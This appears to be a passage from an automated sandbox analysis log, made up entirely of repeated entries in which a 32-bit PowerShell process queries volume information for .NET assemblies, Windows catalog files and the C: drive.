                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
